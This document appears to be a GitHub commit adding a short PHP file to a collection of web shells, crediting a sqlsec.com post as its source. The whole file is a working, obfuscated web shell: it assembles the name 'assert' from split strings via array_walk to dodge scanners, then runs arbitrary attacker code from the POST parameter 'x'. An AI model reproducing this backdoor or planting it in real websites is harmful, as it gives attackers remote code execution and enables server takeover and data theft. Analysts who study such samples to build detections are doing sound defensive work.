Create 2020.08.20.12.php

from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
tennc 2020-08-20 12:35:58 +08:00 committed by GitHub
parent f7c1551c7f
commit aeb2db1e19
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

9
php/2020.08.20.12.php Normal file
View file

@ -0,0 +1,9 @@
<?php
function sqlsec($value,$key)
{
$x = $key.$value;
$x($_POST['x']);
}
$a=array("ass"=>"ert");
array_walk($a,"sqlsec");
?>